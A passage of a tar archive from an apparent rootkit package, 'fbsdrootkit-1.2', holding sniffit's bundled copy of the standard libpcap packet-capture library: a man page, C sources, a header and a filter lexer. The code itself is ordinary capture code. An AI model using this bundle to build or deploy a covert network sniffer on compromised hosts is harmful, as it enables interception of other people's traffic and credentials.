FITNESS FOR A PARTICULAR PURPOSE. .\" .TH PCAP 3 "14 Jun 1994" .SH NAME pcap \- Packet Capture library .SH SYNOPSIS .nf .ft B #include .ft .LP .ft B pcap_t *pcap_open_live(char *device, int snaplen, .ti +8 int promisc, int to_ms, char *ebuf) pcap_t *pcap_open_offline(char *fname, char *ebuf) pcap_dumper_t *pcap_dump_open(pcap_t *p, char *fname) .ft .LP .ft B char errbuf[PCAP_ERRBUF_SIZE]; char *pcap_lookupdev(char *errbuf) int pcap_lookupnet(char *device, u_long *netp, .ti +8 u_long *maskp, char *errbuf) .ft .LP .ft B int pcap_dispatch(pcap_t *p, int cnt, .ti +8 pcap_handler callback, u_char *user) int pcap_loop(pcap_t *p, int cnt, .ti +8 pcap_handler callback, u_char *user) void pcap_dump(u_char *user, struct pcap_pkthdr *h, .ti +8 u_char *sp) .ft .LP .ft B int pcap_immediate(pcap_t *p) .ft .LP .ft B int pcap_compile(pcap_t *p, struct bpf_program *fp, .ti +8 char *str, int optimize, u_long netmask) int pcap_setfilter(pcap_t *p, struct bpf_program *fp) .ft .LP .ft B u_char *pcap_next(pcap_t *p, struct pcap_pkthdr *h) .ft .LP .ft B int pcap_datalink(pcap_t *p) int pcap_snapshot(pcap_t *p) int pcap_is_swapped(pcap_t *p) int pcap_major_version(pcap_t *p) int pcap_minor_version(pcap_t *p) int pcap_stats(pcap_t *p, struct pcap_stat *ps) FILE *pcap_file(pcap_t *p) int pcap_fileno(pcap_t *p) void pcap_perror(pcap_t *p, char *prefix) char *pcap_geterr(pcap_t *p) char *pcap_strerror(int error) .ft .LP .ft B void pcap_close(pcap_t *p) void pcap_dump_close(pcap_dumper_t *p) .ft .fi .SH DESCRIPTION The Packet Capture library provides a high level interface to packet capture systems. All packets on the network, even those destined for other hosts, are accessible through this mechanism. .PP .SH ROUTINES .B pcap_open_live() is used to obtain a packet capture descriptor to look at packets on the network. .I device is a string that specifies the network device to open. .I snaplen specifies the maximum number of bytes to capture. .I to_ms specifies the read timeout in milliseconds. .I ebuf is used to return error text and is only set when .B pcap_open_live() fails and returns .BR NULL . .PP .B pcap_open_offline() is called to open a ``savefile'' for reading. .I fname specifies the name of the file to open. The file has the same format as those used by .B tcpdump(1) and .BR tcpslice(1) . The name "-" in a synonym for .BR stdin . .I ebuf is used to return error text and is only set when .B pcap_open_offline() fails and returns .BR NULL . .PP .B pcap_dump_open() is called to open a ``savefile'' for writing. The name "-" in a synonym for .BR stdin . .B NULL is returned on failure. .I p is a .I pcap struct as returned by .B pcap_open_offline() or .BR pcap_open_live() . .I fname specifies the name of the file to open. If .B NULL is returned, .B pcap_geterr() can be used to get the error text. .PP .B pcap_lookupdev() returns a pointer to a network device suitable for use with .B pcap_open_live() and .BR pcap_lookupnet() . If there is an error, .B NULL is returned and .I errbuf is filled in with with an appropriate error message. .PP .B pcap_lookupnet() is used to determine the network number and mask associated with the network device .BR device . Both .I netp and .I maskp are .I u_long pointers. A return of -1 indicates an error in which case .I errbuf is filled in with with an appropriate error message. .PP .B pcap_dispatch() is used to collect and process packets. .I cnt specifies the maximum number of packets to process before returning. A .I cnt of -1 processes all the packets received in one buffer. A .I cnt of 0 processes all packets until an error occurs (or .B EOF is reached). .I callback specifies a routine to be called with three arguments: a .I u_char pointer which is passed in from .BR pcap_dispatch() , a pointer to the .I pcap_pkthdr struct (which precede the actual network headers and data), and a length. The number of packets read is returned. Zero is returned when .B EOF is reached in a ``savefile.'' A return of -1 indicates an error in which case .B pcap_perror() or .BR pcap_geterr() may be used to display the error text. .PP .B pcap_dump() outputs a packet to the ``savefile'' opened with .BR pcap_dump_open() . Note that its calling arguments are suitable for use with .BR pcap_dispatch() . .ft B (??? this guy is kind of weird.) .ft .PP .B pcap_immediate() sets ``immediate'' mode. If this isn't supported by the under lying packet capture, -1 is returned and the error text can be obtained with .B pcap_perror() or .BR pcap_geterr() . .PP .B pcap_compile() is used to compile the string .I str into a filter program. .I program is a pointer to a .I bpf_program struct and is filled in by .BR pcap_compile() . .I optimize controls whether optimization on the resulting code is performed. .I netmask specifies the netmask of the local net. .PP .B pcap_setfilter() is used to specify the a filter program. .I fp is a pointer to an array of .I bpf_program struct, usually the result of a call to .BR pcap_compile() . .PP .B pcap_loop() is similar to .B pcap_dispatch() except it keeps reading packets until .I cnt packets are processed or an error occurs. A negative .I cnt causes .B pcap_loop() to loop forever (or at least until an error occurs). .PP .B pcap_next() returns a .I u_char pointer to the next packet. .PP .B pcap_datalink() returns the link layer type, e.g. .BR DLT_EN10MB . .PP .B pcap_snapshot() returns the snapshot length specified when .B pcap_open_live was called. .PP .B pcap_is_swapped() returns true if the current ``savefile'' uses a different byte order than the current system. .PP .B pcap_major_version() returns the major number of the version of the pcap used to write the savefile. .PP .B pcap_minor_version() returns the major number of the version of the pcap used to write the savefile. .PP .B pcap_file() returns the name of the ``savefile.'' .PP .B int pcap_stats() returns 0 and fills in a .B pcap_stat struct with packet statistics. If there is an error or the under lying packet capture doesn't support packet statistics, -1 is returned and the error text can be obtained with .B pcap_perror() or .BR pcap_geterr() . .PP .B pcap_fileno() returns the file descriptor number of the ``savefile.'' .PP .B pcap_perror() prints the text of the last pcap library error on .BR stderr , prefixed by .IR prefix . .PP .B pcap_geterr() returns the error text pertaining to the last pcap library error. .PP .B pcap_strerror() is provided in case .BR strerror (1) isn't available. .PP .B pcap_close() closes the files associated with .I p and deallocates resources. .PP .B pcap_dump_close() closes the ``savefile.'' .PP .SH SEE ALSO tcpdump(1), tcpslice(1) .SH BUGS .SH HISTORY fbsdrootkit-1.2/sniffit.0.3.3/libpcap/pcap.c100600 764 0 10045 6257600151 16271 0ustar dfroot/* * Copyright (c) 1993, 1994, 1995 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the Computer Systems * Engineering Group at Lawrence Berkeley Laboratory. * 4. Neither the name of the University nor of the Laboratory may be used * to endorse or promote products derived from this software without * specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. */ #ifndef lint static char rcsid[] = "@(#) $Header: pcap.c,v 1.12+ 94/06/12 14:32:23 leres Exp $ (LBL)"; #endif #include #include #include "pcap-int.h" int pcap_dispatch(pcap_t *p, int cnt, pcap_handler callback, u_char *user) { register int cc; if (p->sf.rfile != NULL) return (pcap_offline_read(p, cnt, callback, user)); /* XXX keep reading until we get something (or an error occurs) */ do { cc = pcap_read(p, cnt, callback, user); } while (cc == 0); return (cc); } int pcap_loop(pcap_t *p, int cnt, pcap_handler callback, u_char *user) { for (;;) { int n = pcap_dispatch(p, cnt, callback, user); if (n <= 0) return (n); if (cnt > 0) { cnt -= n; if (cnt <= 0) return (0); } } } struct singleton { struct pcap_pkthdr *hdr; const u_char *pkt; }; static void pcap_oneshot(u_char *userData, const struct pcap_pkthdr *h, const u_char *pkt) { struct singleton *sp = (struct singleton *)userData; *sp->hdr = *h; sp->pkt = pkt; } const u_char * pcap_next(pcap_t *p, struct pcap_pkthdr *h) { struct singleton s; s.hdr = h; if (pcap_dispatch(p, 1, pcap_oneshot, (u_char*)&s) <= 0) return (0); return (s.pkt); } int pcap_datalink(pcap_t *p) { return (p->linktype); } int pcap_snapshot(pcap_t *p) { return (p->snapshot); } int pcap_is_swapped(pcap_t *p) { return (p->sf.swapped); } int pcap_major_version(pcap_t *p) { return (p->sf.version_major); } int pcap_minor_version(pcap_t *p) { return (p->sf.version_minor); } FILE * pcap_file(pcap_t *p) { return (p->sf.rfile); } int pcap_fileno(pcap_t *p) { return (p->fd); } void pcap_perror(pcap_t *p, char *prefix) { fprintf(stderr, "%s: %s\n", prefix, p->errbuf); } char * pcap_geterr(pcap_t *p) { return (p->errbuf); } /* * Not all systems have strerror(). */ char * pcap_strerror(int errnum) { /* extern int sys_nerr; extern char *sys_errlist[]; */ static char ebuf[20]; /* if ((unsigned int)errnum < sys_nerr) return (sys_errlist[errnum]); */ (void)sprintf(ebuf, "Unknown error: %d", errnum); return(ebuf); } void pcap_close(pcap_t *p) { /*XXX*/ if (p->fd >= 0) close(p->fd); if (p->sf.rfile != NULL) { fclose(p->sf.rfile); if (p->sf.base != NULL) free(p->sf.base); } else if (p->buffer != NULL) free(p->buffer); free(p); } fbsdrootkit-1.2/sniffit.0.3.3/libpcap/pcap.h100400 764 764 11373 6226213211 15761 0ustar dfdf/* * Copyright (c) 1993, 1994 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the Computer Systems * Engineering Group at Lawrence Berkeley Laboratory. * 4. Neither the name of the University nor of the Laboratory may be used * to endorse or promote products derived from this software without * specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * @(#) $Header: pcap.h,v 1.15 94/06/14 20:03:34 leres Exp $ (LBL) */ #ifndef lib_pcap_h #define lib_pcap_h #include #include #include #include #define PCAP_VERSION_MAJOR 2 #define PCAP_VERSION_MINOR 4 #define PCAP_ERRBUF_SIZE 256 /* * Compatibility for systems that have a bpf.h that * predates the bpf typedefs for 64-bit support. */ #if BPF_RELEASE - 0 < 199406 typedef long bpf_int32; typedef u_long bpf_u_int32; #endif typedef struct pcap pcap_t; typedef struct pcap_dumper pcap_dumper_t; /* * The first record in the file contains saved values for some * of the flags used in the printout phases of tcpdump. * Many fields here are longs so compilers won't insert unwanted * padding; these files need to be interchangeable across architectures. */ struct pcap_file_header { bpf_u_int32 magic; u_short version_major; u_short version_minor; bpf_int32 thiszone; /* gmt to local correction */ bpf_u_int32 sigfigs; /* accuracy of timestamps */ bpf_u_int32 snaplen; /* max length saved portion of each pkt */ bpf_u_int32 linktype; /* data link type (DLT_*) */ }; /* * Each packet in the dump file is prepended with this generic header. * This gets around the problem of different headers for different * packet interfaces. */ struct pcap_pkthdr { struct timeval ts; /* time stamp */ bpf_u_int32 caplen; /* length of portion present */ bpf_u_int32 len; /* length this packet (off wire) */ }; /* * As returned by the pcap_stats() */ struct pcap_stat { u_int ps_recv; /* number of packets received */ u_int ps_drop; /* number of packets dropped */ u_int ps_ifdrop; /* drops by interface XXX not yet supported */ }; typedef void (*pcap_handler)(u_char *, const struct pcap_pkthdr *, const u_char *); char *pcap_lookupdev(char *); int pcap_lookupnet(char *, u_long *, u_long *, char *); pcap_t *pcap_open_live(char *, int, int, int, char *); pcap_t *pcap_open_offline(char *, char *); void pcap_close(pcap_t *); int pcap_loop(pcap_t *, int, pcap_handler, u_char *); int pcap_dispatch(pcap_t *, int, pcap_handler, u_char *); const u_char* pcap_next(pcap_t *, struct pcap_pkthdr *); int pcap_stats(pcap_t *, struct pcap_stat *); int pcap_setfilter(pcap_t *, struct bpf_program *); void pcap_perror(pcap_t *, char *); char *pcap_strerror(int); char *pcap_geterr(pcap_t *); int pcap_compile(pcap_t *, struct bpf_program *, char *, int, u_long); /* XXX */ int pcap_freecode(pcap_t *, struct bpf_program *); int pcap_datalink(pcap_t *); int pcap_snapshot(pcap_t *); int pcap_is_swapped(pcap_t *); int pcap_major_version(pcap_t *); int pcap_minor_version(pcap_t *); /* XXX */ FILE *pcap_file(pcap_t *); int pcap_fileno(pcap_t *); pcap_dumper_t *pcap_dump_open(pcap_t *, char *); void pcap_dump_close(pcap_dumper_t *); void pcap_dump(u_char *, const struct pcap_pkthdr *, const u_char *); /* XXX this guy lives in the bpf tree */ u_int bpf_filter(struct bpf_insn *, u_char *, u_int, u_int); char *bpf_image(struct bpf_insn *, int); #endif fbsdrootkit-1.2/sniffit.0.3.3/libpcap/savefile.c100600 764 764 20235 6226213211 16626 0ustar dfdf/* * Copyright (c) 1993, 1994 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that: (1) source code distributions * retain the above copyright notice and this paragraph in its entirety, (2) * distributions including binary code include the above copyright notice and * this paragraph in its entirety in the documentation or other materials * provided with the distribution, and (3) all advertising materials mentioning * features or use of this software display the following acknowledgement: * ``This product includes software developed by the University of California, * Lawrence Berkeley Laboratory and its contributors.'' Neither the name of * the University nor the names of its contributors may be used to endorse * or promote products derived from this software without specific prior * written permission. * THIS SOFTWARE IS PROVIDED ``AS IS'' AND WITHOUT ANY EXPRESS OR IMPLIED * WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED WARRANTIES OF * MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. */ #ifndef lint static char rcsid[] = "@(#)$Header: savefile.c,v 1.16 94/06/20 19:07:56 leres Exp $ (LBL)"; #endif /* * savefile.c - supports offline use of tcpdump * Extraction/creation by Jeffrey Mogul, DECWRL * Modified by Steve McCanne, LBL. * * Used to save the received packet headers, after filtering, to * a file, and then read them later. * The first record in the file contains saved values for the machine * dependent values so we can print the dump file on any architecture. */ #include #include #include #include #include #include #include #include #include "pcap-int.h" #define TCPDUMP_MAGIC 0xa1b2c3d4 /* * We use the "receiver-makes-right" approach to byte order, * because time is at a premium when we are writing the file. * In other words, the pcap_file_header and pcap_pkthdr, * records are written in host byte order. * Note that the packets are always written in network byte order. * * ntoh[ls] aren't sufficient because we might need to swap on a big-endian * machine (if the file was written in little-end order). */ #define SWAPLONG(y) \ ((((y)&0xff)<<24) | (((y)&0xff00)<<8) | (((y)&0xff0000)>>8) | (((y)>>24)&0xff)) #define SWAPSHORT(y) \ ( (((y)&0xff)<<8) | (((y)&0xff00)>>8) ) #define SFERR_TRUNC 1 #define SFERR_BADVERSION 2 #define SFERR_BADF 3 #define SFERR_EOF 4 /* not really an error, just a status */ static int sf_write_header(FILE *fp, int linktype, int thiszone, int snaplen) { struct pcap_file_header hdr; hdr.magic = TCPDUMP_MAGIC; hdr.version_major = PCAP_VERSION_MAJOR; hdr.version_minor = PCAP_VERSION_MINOR; hdr.thiszone = thiszone; hdr.snaplen = snaplen; hdr.sigfigs = 0; hdr.linktype = linktype; if (fwrite((char *)&hdr, sizeof(hdr), 1, fp) != 1) return (-1); return (0); } static void swap_hdr(struct pcap_file_header *hp) { hp->version_major = SWAPSHORT(hp->version_major); hp->version_minor = SWAPSHORT(hp->version_minor); hp->thiszone = SWAPLONG(hp->thiszone); hp->sigfigs = SWAPLONG(hp->sigfigs); hp->snaplen = SWAPLONG(hp->snaplen); hp->linktype = SWAPLONG(hp->linktype); } pcap_t * pcap_open_offline(char *fname, char *errbuf) { register pcap_t *p; register FILE *fp; struct pcap_file_header hdr; int linklen; p = (pcap_t *)malloc(sizeof(*p)); if (p == NULL) { strcpy(errbuf, "out of swap"); return (NULL); } #ifdef notdef bzero(p, sizeof(*p)); #else memset(p, 0, sizeof(*p)); #endif /* * Set this field so we don't close stdin in pcap_close! */ p->fd = -1; if (fname[0] == '-' && fname[1] == '\0') fp = stdin; else { fp = fopen(fname, "r"); if (fp == NULL) { sprintf(errbuf, "%s: %s", fname, pcap_strerror(errno)); goto bad; } } if (fread((char *)&hdr, sizeof(hdr), 1, fp) != 1) { sprintf(errbuf, "fread: %s", pcap_strerror(errno)); goto bad; } if (hdr.magic != TCPDUMP_MAGIC) { if (SWAPLONG(hdr.magic) != TCPDUMP_MAGIC) { sprintf(errbuf, "bad dump file format"); goto bad; } p->sf.swapped = 1; swap_hdr(&hdr); } if (hdr.version_major < PCAP_VERSION_MAJOR) { sprintf(errbuf, "archaic file format"); goto bad; } p->tzoff = hdr.thiszone; p->snapshot = hdr.snaplen; p->linktype = hdr.linktype; p->sf.rfile = fp; p->bufsize = hdr.snaplen; /* Align link header as required for proper data alignment */ linklen = 14; /* XXX */ p->sf.base = (u_char *)malloc(p->bufsize + BPF_ALIGNMENT); p->buffer = p->sf.base + BPF_ALIGNMENT - (linklen % BPF_ALIGNMENT); p->sf.version_major = hdr.version_major; p->sf.version_minor = hdr.version_minor; return (p); bad: free(p); return (NULL); } /* * Read sf_readfile and return the next packet. Return the header in hdr * and the contents in buf. Return 0 on success, SFERR_EOF if there were * no more packets, and SFERR_TRUNC if a partial packet was encountered. */ static int sf_next_packet(pcap_t *p, struct pcap_pkthdr *hdr, u_char *buf, int buflen) { FILE *fp = p->sf.rfile; /* read the stamp */ if (fread((char *)hdr, sizeof(struct pcap_pkthdr), 1, fp) != 1) { /* probably an EOF, though could be a truncated packet */ return (1); } if (p->sf.swapped) { /* these were written in opposite byte order */ hdr->caplen = SWAPLONG(hdr->caplen); hdr->len = SWAPLONG(hdr->len); hdr->ts.tv_sec = SWAPLONG(hdr->ts.tv_sec); hdr->ts.tv_usec = SWAPLONG(hdr->ts.tv_usec); } /* * We interchanged the caplen and len fields at version 2.3, * in order to match the bpf header layout. But unfortunately * some files were written with version 2.3 in their headers * but without the interchanged fields. */ if (p->sf.version_minor < 3 || (p->sf.version_minor == 3 && hdr->caplen > hdr->len)) { int t = hdr->caplen; hdr->caplen = hdr->len; hdr->len = t; } if (hdr->caplen > buflen) { /* * This can happen due to Solaris 2.3 systems tripping * over the BUFMOD problem and not setting the snapshot * correctly in the savefile header. If the caplen isn't * grossly wrong, try to salvage. */ static u_char *tp = NULL; static int tsize = 0; if (tsize < hdr->caplen) { tsize = ((hdr->caplen + 1023) / 1024) * 1024; if (tp != NULL) free((u_char *)tp); tp = (u_char *)malloc(tsize); if (tp == NULL) { sprintf(p->errbuf, "BUFMOD hack malloc"); return (-1); } } if (fread((char *)tp, hdr->caplen, 1, fp) != 1) { sprintf(p->errbuf, "truncated dump file"); return (-1); } memcpy((char *)buf, (char *)tp, buflen); } else { /* read the packet itself */ if (fread((char *)buf, hdr->caplen, 1, fp) != 1) { sprintf(p->errbuf, "truncated dump file"); return (-1); } } return (0); } /* * Print out packets stored in the file initialized by sf_read_init(). * If cnt > 0, return after 'cnt' packets, otherwise continue until eof. */ int pcap_offline_read(pcap_t *p, int cnt, pcap_handler callback, u_char *user) { struct bpf_insn *fcode = p->fcode.bf_insns; int status = 0; int n = 0; while (status == 0) { struct pcap_pkthdr h; status = sf_next_packet(p, &h, p->buffer, p->bufsize); if (status) { if (status == 1) return (0); return (status); } if (fcode == NULL || bpf_filter(fcode, p->buffer, h.len, h.caplen)) { (*callback)(user, &h, p->buffer); if (++n >= cnt && cnt > 0) break; } } /*XXX this breaks semantics tcpslice expects */ return (n); } /* * Output a packet to the initialized dump file. */ void pcap_dump(u_char *user, const struct pcap_pkthdr *h, const u_char *sp) { FILE * f = (FILE *)user; (void)fwrite((char *)h, sizeof(*h), 1, f); (void)fwrite((char *)sp, h->caplen, 1, f); } /* * Initialize so that sf_write() will output to the file named 'fname'. */ pcap_dumper_t * pcap_dump_open(pcap_t *p, char *fname) { FILE *f; if (fname[0] == '-' && fname[1] == '\0') f = stdout; else { f = fopen(fname, "w"); if (f == NULL) { sprintf(p->errbuf, "%s: %s", fname, pcap_strerror(errno)); return (NULL); } } (void)sf_write_header(f, p->linktype, p->tzoff, p->snapshot); return ((pcap_dumper_t *)f); } void pcap_dump_close(pcap_dumper_t *p) { fclose((FILE *)p); } fbsdrootkit-1.2/sniffit.0.3.3/libpcap/scanner.l100400 764 764 10177 6226213211 16474 0ustar dfdf%{ /* * Copyright (c) 1988, 1989, 1990, 1991, 1992, 1993, 1994 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that: (1) source code distributions * retain the above copyright notice and this paragraph in its entirety, (2) * distributions including binary code include the above copyright notice and * this paragraph in its entirety in the documentation or other materials * provided with the distribution, and (3) all advertising materials mentioning * features or use of this software display the following acknowledgement: * ``This product includes software developed by the University of California, * Lawrence Berkeley Laboratory and its contributors.'' Neither the name of * the University nor the names of its contributors may be used to endorse * or promote products derived from this software without specific prior * written permission. * THIS SOFTWARE IS PROVIDED ``AS IS'' AND WITHOUT ANY EXPRESS OR IMPLIED * WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED WARRANTIES OF * MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. */ #ifndef lint static char rcsid[] = "@(#) $Header: scanner.l,v 1.40 94/06/10 17:21:44 mccanne Exp $ (LBL)"; #endif #include #include #include #include #include #include "gencode.h" #include "tokdefs.h" #ifndef __GNUC__ #define inline #endif static int stoi(char *); static inline int xdtoi(int); #ifdef FLEX_SCANNER #undef YY_INPUT #define YY_INPUT(buf, result, max)\ {\ char *src = in_buffer;\ int i;\ \ if (*src == 0)\ result = YY_NULL;\ else {\ for (i = 0; *src && i < max; ++i)\ buf[i] = *src++;\ in_buffer += i;\ result = i;\ }\ } #else #undef getc #define getc(fp) (*in_buffer == 0 ? EOF : *in_buffer++) #endif #define yylval pcap_lval extern YYSTYPE yylval; static char *in_buffer; %} N ([0-9]+|(0X|0x)[0-9A-Fa-f]+) B ([0-9A-Fa-f][0-9A-Fa-f]?) %a 3000 %% dst return DST; src return SRC; link|ether|ppp|slip return LINK; fddi return LINK; arp return ARP; rarp return RARP; ip return IP; tcp return TCP; udp return UDP; icmp return ICMP; decnet return DECNET; lat return LAT; moprc return MOPRC; mopdl return MOPDL; host return HOST; net return NET; port return PORT; proto return PROTO; gateway return GATEWAY; less return LESS; greater return GREATER; byte return BYTE; broadcast return TK_BROADCAST; multicast return TK_MULTICAST; and|"&&" return AND; or|"||" return OR; not return '!'; len|length return LEN; inbound return INBOUND; outbound return OUTBOUND; [ \n\t] ; [+\-*/:\[\]!<>()&|=] return yytext[0]; ">=" return GEQ; "<=" return LEQ; "!=" return NEQ; "==" return '='; "<<" return LSH; ">>" return RSH; {N} { yylval.i = stoi((char *)yytext); return NUM; } ({N}\.{N})|({N}\.{N}\.{N})|({N}\.{N}\.{N}\.{N}) { yylval.s = sdup((char *)yytext); return HID; } {B}:{B}:{B}:{B}:{B}:{B} { yylval.e = pcap_ether_aton((char *)yytext); return EID; } {B}:+({B}:+)+ { bpf_error("bogus ethernet address %s", yytext); } [A-Za-z][-_.A-Za-z0-9]* { yylval.s = sdup((char *)yytext); return ID; } "\\"[^ !()\n\t]+ { yylval.s = sdup((char *)yytext + 1); return ID; } [^ \[\]\t\n\-_.A-Za-z0-9!<>()&|=]+ { bpf_error("illegal token: %s\n", yytext); } . { bpf_error("illegal char '%c'", *yytext); } %% void lex_init(buf) char *buf; { in_buffer = buf; } /* * Also define a yywrap. Note that if we're using flex, it will * define a macro to map this identifier to pcap_wrap. */ int yywrap() { return 1; } /* Hex digit to integer. */ static inline int xdtoi(c) register int c; { if (isdigit(c)) return c - '0'; else if (islower(c)) return c - 'a' + 10; else return c - 'A' + 10; } /* * Convert string to integer. Just like atoi(), but checks for * preceding 0x or 0 and uses hex or octal instead of decimal. */ static int stoi(s) char *s; { int base = 10; int n = 0; if (*s == '0') { if (s[1] == 'x' || s[1] == 'X') { s += 2; base = 16; } else { base = 8; s += 1; } } while (*s) n = n * base + xdtoi(*s++); return n; } fbsdrootkit-1.2/sniffit.0.3.3/libpcap/pcap.c.orig100600 764 764 10031 6226213211 16703 0ustar dfdf/* * Copyright (c) 1993, 1994, 1995 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the Computer Systems * Engineering Group at Lawrence Berkeley Laboratory. * 4. Neither the name of the University nor of the Laboratory may be used * to endorse or promote products derived from this software without * specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. */ #ifndef lint static char rcsid[] = "@(#) $Header: pcap.c,v 1.12+ 94/06/12 14:32:23 leres Exp $ (LBL)"; #endif #include #include #include "pcap-int.h" int pcap_dispatch(pcap_t *p, int cnt, pcap_handler callback, u_char *user) { register int cc; if (p->sf.rfile != NULL) return (pcap_offline_read(p, cnt, callback, user)); /* XXX keep reading until we get something (or an error occurs) */ do { cc = pcap_read(p, cnt, callback, user); } while (cc == 0); return (cc); } int pcap_loop(pcap_t *p, int cnt, pcap_handler callback, u_char *user) { for (;;) { int n = pcap_dispatch(p, cnt, callback, user); if (n <= 0) return (n); if (cnt > 0) { cnt -= n; if (cnt <= 0) return (0); } } } struct singleton { struct pcap_pkthdr *hdr; const u_char *pkt; }; static void pcap_oneshot(u_char *userData, const struct pcap_pkthdr *h, const u_char *pkt) { struct singleton *sp = (struct singleton *)userData; *sp->hdr = *h; sp->pkt = pkt; } const u_char * pcap_next(pcap_t *p, struct pcap_pkthdr *h) { struct singleton s; s.hdr = h; if (pcap_dispatch(p, 1, pcap_oneshot, (u_char*)&s) <= 0) return (0); return (s.pkt); } int pcap_datalink(pcap_t *p) { return (p->linktype); } int pcap_snapshot(pcap_t *p) { return (p->snapshot); } int pcap_is_swapped(pcap_t *p) { return (p->sf.swapped); } int pcap_major_version(pcap_t *p) { return (p->sf.version_major); } int pcap_minor_version(pcap_t *p) { return (p->sf.version_minor); } FILE * pcap_file(pcap_t *p) { return (p->sf.rfile); } int pcap_fileno(pcap_t *p) { return (p->fd); } void pcap_perror(pcap_t *p, char *prefix) { fprintf(stderr, "%s: %s\n", prefix, p->errbuf); } char * pcap_geterr(pcap_t *p) { return (p->errbuf); } /* * Not all systems have strerror(). */ char * pcap_strerror(int errnum) { extern int sys_nerr; extern char *sys_errlist[]; static char ebuf[20]; if ((unsigned int)errnum < sys_nerr) return (sys_errlist[errnum]); (void)sprintf(ebuf, "Unknown error: %d", errnum); return(ebuf); } void pcap_close(pcap_t *p) { /*XXX*/ if (p->fd >= 0) close(p->fd); if (p->sf.rfile != NULL) { fclose(p->sf.rfile); if (p->sf.base != NULL) free(p->sf.base); } else if (p->buffer != NULL) free(p->buffer); free(p); } fbsdrootkit-1.2/sniffit.0.3.3/pcap.h100600 764 764 11373 6226213211 14351 0ustar dfdf/* * Copyright (c) 1993, 1994 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the Computer Systems * Engineering Group at Lawrence 